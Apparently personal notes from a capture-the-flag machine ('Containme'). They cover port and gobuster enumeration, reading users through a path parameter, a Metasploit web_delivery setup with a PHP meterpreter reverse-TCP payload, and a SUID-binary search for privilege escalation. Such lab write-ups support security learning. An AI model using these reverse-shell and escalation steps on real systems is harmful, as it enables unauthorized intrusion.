Containme

ports 22,80,2222,8022

simply have to try harder enumerating

gobuster scan reveal index.php

we find a index.php and viewing the source reveals path parameter. we use this to view the users on the box user mike revealed

// meterpreter
use exploit/multi/script/web_delivery
 set TARGET PHP
 TARGET => PHP
show payloads
set payload payload/php/meterpreter_reverse_tcp

 find / -perm -4000 2>/dev/null
 
  /usr/share/man/zh_TW/crypt mike
  ifconfig